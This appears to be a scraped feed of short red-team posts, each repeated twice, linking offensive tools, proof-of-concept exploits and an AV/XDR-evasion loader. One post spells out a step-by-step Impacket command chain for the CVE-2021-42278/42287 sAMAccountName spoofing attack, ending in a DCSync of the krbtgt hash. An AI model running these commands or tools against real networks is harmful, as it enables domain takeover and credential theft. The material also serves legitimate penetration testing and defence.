ipsourcebypass
This Python script can be used to bypass IP source restrictions using HTTP headers.
https://github.com/p0dalirius/ipsourcebypass
#ip #header #bypass #bugbounty
This Python script can be used to bypass IP source restrictions using HTTP headers.
https://github.com/p0dalirius/ipsourcebypass
#ip #header #bypass #bugbounty
Example Reports
If you're looking for examples of pentest reports, globalcptc has released redacted versions of the teams that made it to finals for the last 2 years (25 reports)
https://github.com/nationalcptc/report_examples
If you're looking for examples of pentest reports, globalcptc has released redacted versions of the teams that made it to finals for the last 2 years (25 reports)
https://github.com/nationalcptc/report_examples
GitHub
GitHub - globalcptc/report_examples: Example reports from prior years of the Collegiate Penetration Testing Competition
Example reports from prior years of the Collegiate Penetration Testing Competition - globalcptc/report_examples
Log4j RCE — CVE-2021-44228
The vulnerability allows for unauthenticated remote code execution. Log4j 2 is an open source Java logging library developed by the Apache Foundation. Log4j 2 is widely used in many applications and is present, as a dependency, in many services. These include enterprise applications as well as numerous cloud services.
# https://www.lunasec.io/docs/blog/log4j-zero-day/
# https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6
# https://github.com/whwlsfb/Log4j2Scan
# https://github.com/Cybereason/Logout4Shell
#apache #log4j #cve #rce
The vulnerability allows for unauthenticated remote code execution. Log4j 2 is an open source Java logging library developed by the Apache Foundation. Log4j 2 is widely used in many applications and is present, as a dependency, in many services. These include enterprise applications as well as numerous cloud services.
# https://www.lunasec.io/docs/blog/log4j-zero-day/
# https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6
# https://github.com/whwlsfb/Log4j2Scan
# https://github.com/Cybereason/Logout4Shell
#apache #log4j #cve #rce
ldapconsole
It's a script allowing to perfom custom LDAP queries to a Windows domain and select specific attributes.
Features
— Authenticate with password
— Authenticate with LM:NT hashes
— Authenticate with kerberos ticket
https://github.com/p0dalirius/ldapconsole
#ldap #query #tools
It's a script allowing to perfom custom LDAP queries to a Windows domain and select specific attributes.
Features
— Authenticate with password
— Authenticate with LM:NT hashes
— Authenticate with kerberos ticket
https://github.com/p0dalirius/ldapconsole
#ldap #query #tools
GitHub
GitHub - p0dalirius/ldapconsole: The ldapconsole script allows you to perform custom LDAP requests to a Windows domain.
The ldapconsole script allows you to perform custom LDAP requests to a Windows domain. - p0dalirius/ldapconsole
Domain Admin in only 5 minutes via Name Impersonation (CVE-2021-42278)
Before patch, there was a weird behavior on the KDC. When requesting a service ticket, if the KDC wasn't able to find the user behind the TGT, it would make another lookup, but this time with an "$" at the end of the name
This allows for a new kind of spoofing attack where attackers that have enough control over a machine account can spoof a domain controller.
Example:
0. Create a сomputer account
# https://exploit.ph/more-samaccountname-impersonation.html
# https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing
# https://www.geekby.site/2021/12/samaccountname-spoofing/
# https://gist.github.com/snovvcrash/3bf1a771ea6b376d374facffa9e43383
#ad #pac #s4u2self #windows #redteam
Before patch, there was a weird behavior on the KDC. When requesting a service ticket, if the KDC wasn't able to find the user behind the TGT, it would make another lookup, but this time with an "$" at the end of the name
This allows for a new kind of spoofing attack where attackers that have enough control over a machine account can spoof a domain controller.
Example:
0. Create a сomputer account
addcomputer.py -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-host DC01 -domain-netbios domain 'domain.local/user1:complexpassword'
1. Clear its SPNsaddspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController
2. Rename the computer (computer -> DC)renameMachine.py -current-name 'ControlledComputer$' -new-name 'DomainController' -dc-ip 'DomainController.domain.local' 'domain.local'/'user':'password'
3. Obtain a TGTgetTGT.py -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController':'ComputerPassword'
4. Reset the computer namerenameMachine.py -current-name 'DomainController' -new-name 'ControlledComputer$' 'domain.local'/'user':'password'
5. Bbtain a service ticket with S4U2self by presenting the previous TGTKRB5CCNAME='DomainController.ccache' getST.py -self -impersonate 'DomainAdmin' -spn 'cifs/DomainController.domain.local' -k -no-pass -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController'
6. DCSync by presenting the service ticketKRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local'
# https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html# https://exploit.ph/more-samaccountname-impersonation.html
# https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing
# https://www.geekby.site/2021/12/samaccountname-spoofing/
# https://gist.github.com/snovvcrash/3bf1a771ea6b376d374facffa9e43383
#ad #pac #s4u2self #windows #redteam
APT
Domain Admin in only 5 minutes via Name Impersonation (CVE-2021-42278) Before patch, there was a weird behavior on the KDC. When requesting a service ticket, if the KDC wasn't able to find the user behind the TGT, it would make another lookup, but this time…
Automated Exploitation of the CVE-2021-42287/CVE-2021-42278 (Windows)
Binary:
https://github.com/cube0x0/noPac
PowerShell:
https://gist.github.com/S3cur3Th1sSh1t/0ed2fb0b5ae485b68cbc50e89581baa6
#ad #pac #s4u2self #windows #redteam
Binary:
https://github.com/cube0x0/noPac
PowerShell:
https://gist.github.com/S3cur3Th1sSh1t/0ed2fb0b5ae485b68cbc50e89581baa6
#ad #pac #s4u2self #windows #redteam
ADenum
ADEnum is a pentesting tool that allows to find misconfiguration through the protocol LDAP and exploit some of those weaknesses with Kerberos.
https://github.com/SecuProject/ADenum
#ad #ldap #kerberos #enumeration #tools
ADEnum is a pentesting tool that allows to find misconfiguration through the protocol LDAP and exploit some of those weaknesses with Kerberos.
https://github.com/SecuProject/ADenum
#ad #ldap #kerberos #enumeration #tools
GitLab CI jobs unmasked passwords scanner
https://github.com/Whitespots-OU/gitlab-ci-secrets
#tools #secrets #devsecops
https://github.com/Whitespots-OU/gitlab-ci-secrets
#tools #secrets #devsecops
GitHub
GitHub - Whitespots-OU/gitlab-ci-secrets: Gitlab CI jobs stdout secrets finder
Gitlab CI jobs stdout secrets finder. Contribute to Whitespots-OU/gitlab-ci-secrets development by creating an account on GitHub.
log4hshell — Quick Guide
https://musana.net/2021/12/13/log4shell-Quick-Guide/
#log4j #waf #bypass #bugbounty
https://musana.net/2021/12/13/log4shell-Quick-Guide/
#log4j #waf #bypass #bugbounty
Cobalt-Clip
Cobalt-clip is clipboard addons for Cobalt Strike to interact with clipboard. With this you can dump, edit and monitor the content of clipboard.
https://github.com/DallasFR/Cobalt-Clip
#cobaltstrike #clipboard #dump
Cobalt-clip is clipboard addons for Cobalt Strike to interact with clipboard. With this you can dump, edit and monitor the content of clipboard.
https://github.com/DallasFR/Cobalt-Clip
#cobaltstrike #clipboard #dump
Data Masking Bash OneLiner
If you need to mask data from utilities such as Responder\Inveigh for your report, use the following command:
If you need to mask data from utilities such as Responder\Inveigh for your report, use the following command:
cat hash.txt | awk -F ":" '{print $1"::"$3":"$4":"substr($5,1,4)"***"substr($6,20,20)"***"substr($6,length($6)-8,8)}' | sort -u | sort -u -t : -k 1,1
The following command can be used to mask data HashCat output:cat hash-hashcat.txt | awk -F ":" '{print ($3"/")$1":"substr($7,1,2)"******"substr($7,length($7)-1,3)}' | sort -u
#report #mask #data #pentestBypass AV & Advanced XDR solutions
Mortar Loader is able to bypass modern anti-virus products and advanced XDR solutions and it has been tested and confirmed bypass for the following:
— Kaspersky
— ESET
— Malewarebytes
— Mcafee
— Cortex XDR
— Windows defender
— Cylance
Research:
https://0xsp.com/security%20research%20&%20development%20(SRD)/defeat-the-castle-bypass-av-advanced-xdr-solutions
Source:
https://github.com/0xsp-SRD/mortar
#av #xdr #evasion #redteam
Mortar Loader is able to bypass modern anti-virus products and advanced XDR solutions and it has been tested and confirmed bypass for the following:
— Kaspersky
— ESET
— Malewarebytes
— Mcafee
— Cortex XDR
— Windows defender
— Cylance
Research:
https://0xsp.com/security%20research%20&%20development%20(SRD)/defeat-the-castle-bypass-av-advanced-xdr-solutions
Source:
https://github.com/0xsp-SRD/mortar
#av #xdr #evasion #redteam
PreAuth RCE in ManageEngine ServiceDesk Plus (CVE-2021-44077)
PoC:
https://github.com/horizon3ai/CVE-2021-44077
Research:
https://xz.aliyun.com/t/10631
#manageengine #servicedesk #rce #cve
PoC:
https://github.com/horizon3ai/CVE-2021-44077
Research:
https://xz.aliyun.com/t/10631
#manageengine #servicedesk #rce #cve
GitHub
GitHub - horizon3ai/CVE-2021-44077: Proof of Concept Exploit for ManageEngine ServiceDesk Plus CVE-2021-44077
Proof of Concept Exploit for ManageEngine ServiceDesk Plus CVE-2021-44077 - horizon3ai/CVE-2021-44077